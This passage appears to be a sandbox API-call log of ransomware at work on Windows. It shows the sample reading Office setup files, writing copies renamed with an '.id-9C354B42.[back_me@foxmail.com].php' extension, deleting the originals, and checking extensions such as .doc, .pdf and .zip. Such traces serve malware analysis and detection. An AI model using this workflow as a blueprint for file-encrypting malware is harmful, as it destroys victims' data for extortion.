lpNumberOfBytesWritten=0x312fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0042.191] SetEndOfFile (hFile=0x21c) returned 1 [0042.192] CloseHandle (hObject=0x21c) returned 1 [0042.192] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.192] SetEndOfFile (hFile=0x218) returned 1 [0042.193] CloseHandle (hObject=0x218) returned 1 [0042.193] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0042.193] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proof.es\\proof.xml")) returned 1 [0042.193] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0042.193] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0042.194] lstrlenW (lpString=".doc") returned 4 [0042.194] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.194] lstrlenW (lpString=".docx") returned 5 [0042.194] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0042.194] lstrlenW (lpString=".pdf") returned 4 [0042.194] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.194] lstrlenW (lpString=".xls") returned 4 [0042.194] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.194] lstrlenW (lpString=".xlsx") returned 5 [0042.194] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0042.194] lstrlenW (lpString=".ppt") returned 4 [0042.194] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.194] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0042.194] lstrlenW (lpString=".zip") returned 4 [0042.194] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.194] lstrlenW (lpString=".rar") returned 4 [0042.194] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.194] lstrlenW (lpString=".bz2") returned 4 [0042.194] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.194] lstrlenW (lpString=".7z") returned 3 [0042.194] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.194] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0042.194] lstrlenW (lpString=".dbf") returned 4 [0042.194] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.194] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0042.194] lstrlenW (lpString=".1cd") returned 4 [0042.194] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.194] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0042.194] lstrlenW (lpString=".jpg") returned 4 [0042.194] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.194] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0042.195] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0042.195] lstrlenW (lpString=".doc") returned 4 [0042.195] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.195] lstrlenW (lpString=".docx") returned 5 [0042.195] lstrcmpiW (lpString1=".docx", lpString2="f.XML") returned -1 [0042.195] lstrlenW (lpString=".pdf") returned 4 [0042.195] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.195] lstrlenW (lpString=".xls") returned 4 [0042.195] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.195] lstrlenW (lpString=".xlsx") returned 5 [0042.195] lstrcmpiW (lpString1=".xlsx", lpString2="f.XML") returned -1 [0042.195] lstrlenW (lpString=".ppt") returned 4 [0042.195] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.195] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0042.195] lstrlenW (lpString=".zip") returned 4 [0042.195] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.195] lstrlenW (lpString=".rar") returned 4 [0042.195] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.195] lstrlenW (lpString=".bz2") returned 4 [0042.195] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.195] lstrlenW (lpString=".7z") returned 3 [0042.195] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.195] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0042.195] lstrlenW (lpString=".dbf") returned 4 [0042.195] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.195] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0042.195] lstrlenW (lpString=".1cd") returned 4 [0042.195] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.195] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proof.es\\Proof.XML") returned 98 [0042.195] lstrlenW (lpString=".jpg") returned 4 [0042.195] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.196] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0042.196] lstrlenW (lpString="ProPlusrWW.XML") returned 14 [0042.196] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0042.255] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=16852) returned 1 [0042.255] CloseHandle (hObject=0x20c) returned 1 [0042.255] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml")) returned 0x20 [0042.255] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0042.255] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0042.255] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.255] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.255] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0042.259] GetLastError () returned 0x0 [0042.259] ReadFile (in: hFile=0x20c, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x41d4, lpOverlapped=0x0) returned 1 [0042.267] WriteFile (in: hFile=0x208, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x41e0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x41e0, lpOverlapped=0x0) returned 1 [0042.268] ReadFile (in: hFile=0x20c, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.268] WriteFile (in: hFile=0x208, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0042.268] SetEndOfFile (hFile=0x208) returned 1 [0042.268] CloseHandle (hObject=0x208) returned 1 [0042.269] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.269] SetEndOfFile (hFile=0x20c) returned 1 [0042.270] CloseHandle (hObject=0x20c) returned 1 [0042.270] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0042.270] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml")) returned 1 [0042.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.270] lstrlenW (lpString=".doc") returned 4 [0042.271] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.271] lstrlenW (lpString=".docx") returned 5 [0042.271] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0042.271] lstrlenW (lpString=".pdf") returned 4 [0042.271] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.271] lstrlenW (lpString=".xls") returned 4 [0042.271] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.271] lstrlenW (lpString=".xlsx") returned 5 [0042.271] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0042.271] lstrlenW (lpString=".ppt") returned 4 [0042.271] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.271] lstrlenW (lpString=".zip") returned 4 [0042.271] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.271] lstrlenW (lpString=".rar") returned 4 [0042.271] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.271] lstrlenW (lpString=".bz2") returned 4 [0042.271] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.271] lstrlenW (lpString=".7z") returned 3 [0042.271] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.271] lstrlenW (lpString=".dbf") returned 4 [0042.271] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.271] lstrlenW (lpString=".1cd") returned 4 [0042.271] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.271] lstrlenW (lpString=".jpg") returned 4 [0042.271] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.272] lstrlenW (lpString=".doc") returned 4 [0042.272] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.272] lstrlenW (lpString=".docx") returned 5 [0042.272] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0042.272] lstrlenW (lpString=".pdf") returned 4 [0042.272] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.272] lstrlenW (lpString=".xls") returned 4 [0042.272] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.272] lstrlenW (lpString=".xlsx") returned 5 [0042.272] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0042.272] lstrlenW (lpString=".ppt") returned 4 [0042.272] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.272] lstrlenW (lpString=".zip") returned 4 [0042.272] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.272] lstrlenW (lpString=".rar") returned 4 [0042.272] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.272] lstrlenW (lpString=".bz2") returned 4 [0042.272] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.272] lstrlenW (lpString=".7z") returned 3 [0042.272] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.272] lstrlenW (lpString=".dbf") returned 4 [0042.272] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.272] lstrlenW (lpString=".1cd") returned 4 [0042.272] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0042.272] lstrlenW (lpString=".jpg") returned 4 [0042.272] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.273] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0042.273] lstrlenW (lpString="VisioMUI.XML") returned 12 [0042.273] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0043.012] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=9503) returned 1 [0043.012] CloseHandle (hObject=0x1a0) returned 1 [0043.012] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml")) returned 0x20 [0043.021] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0043.022] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0043.022] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.022] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.022] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0043.210] GetLastError () returned 0x0 [0043.210] ReadFile (in: hFile=0x1a0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x251f, lpOverlapped=0x0) returned 1 [0043.238] WriteFile (in: hFile=0x198, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x2520, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x2520, lpOverlapped=0x0) returned 1 [0043.239] ReadFile (in: hFile=0x1a0, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.239] WriteFile (in: hFile=0x198, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.239] SetEndOfFile (hFile=0x198) returned 1 [0043.239] CloseHandle (hObject=0x198) returned 1 [0043.240] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.240] SetEndOfFile (hFile=0x1a0) returned 1 [0043.240] CloseHandle (hObject=0x1a0) returned 1 [0043.241] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0043.241] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visio.en-us\\visiomui.xml")) returned 1 [0043.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0043.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0043.241] lstrlenW (lpString=".doc") returned 4 [0043.241] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0043.241] lstrlenW (lpString=".docx") returned 5 [0043.241] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0043.241] lstrlenW (lpString=".pdf") returned 4 [0043.241] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0043.241] lstrlenW (lpString=".xls") returned 4 [0043.241] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0043.241] lstrlenW (lpString=".xlsx") returned 5 [0043.241] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0043.241] lstrlenW (lpString=".ppt") returned 4 [0043.241] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0043.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0043.241] lstrlenW (lpString=".zip") returned 4 [0043.241] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0043.241] lstrlenW (lpString=".rar") returned 4 [0043.241] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0043.242] lstrlenW (lpString=".bz2") returned 4 [0043.242] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0043.242] lstrlenW (lpString=".7z") returned 3 [0043.242] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0043.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0043.242] lstrlenW (lpString=".dbf") returned 4 [0043.242] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0043.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0043.242] lstrlenW (lpString=".1cd") returned 4 [0043.242] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0043.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0043.242] lstrlenW (lpString=".jpg") returned 4 [0043.242] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0043.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0043.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0043.242] lstrlenW (lpString=".doc") returned 4 [0043.242] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0043.242] lstrlenW (lpString=".docx") returned 5 [0043.242] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0043.242] lstrlenW (lpString=".pdf") returned 4 [0043.242] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0043.242] lstrlenW (lpString=".xls") returned 4 [0043.242] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0043.242] lstrlenW (lpString=".xlsx") returned 5 [0043.242] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0043.242] lstrlenW (lpString=".ppt") returned 4 [0043.242] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0043.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0043.242] lstrlenW (lpString=".zip") returned 4 [0043.242] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0043.242] lstrlenW (lpString=".rar") returned 4 [0043.242] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0043.242] lstrlenW (lpString=".bz2") returned 4 [0043.242] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0043.243] lstrlenW (lpString=".7z") returned 3 [0043.243] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0043.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0043.243] lstrlenW (lpString=".dbf") returned 4 [0043.243] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0043.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0043.243] lstrlenW (lpString=".1cd") returned 4 [0043.243] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0043.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Visio.en-us\\VisioMUI.XML") returned 104 [0043.243] lstrlenW (lpString=".jpg") returned 4 [0043.243] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0043.243] lstrcmpiW (lpString1=".jpg", lpString2=".php") returned -1 [0043.243] lstrlenW (lpString="Bears.jpg") returned 9 [0043.243] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0043.282] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=1074) returned 1 [0043.282] CloseHandle (hObject=0x214) returned 1 [0043.282] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg")) returned 0x20 [0043.283] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0043.283] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0043.283] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0043.283] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned 67 [0043.283] lstrlenW (lpString=".doc") returned 4 [0043.283] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0043.283] lstrlenW (lpString=".docx") returned 5 [0043.283] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0043.283] lstrlenW (lpString=".pdf") returned 4 [0043.283] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0043.283] lstrlenW (lpString=".xls") returned 4 [0043.283] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0043.283] lstrlenW (lpString=".xlsx") returned 5 [0043.283] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0043.283] lstrlenW (lpString=".ppt") returned 4 [0043.283] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0043.283] lstrlenW (lpString="C:\\Program Files\\Common 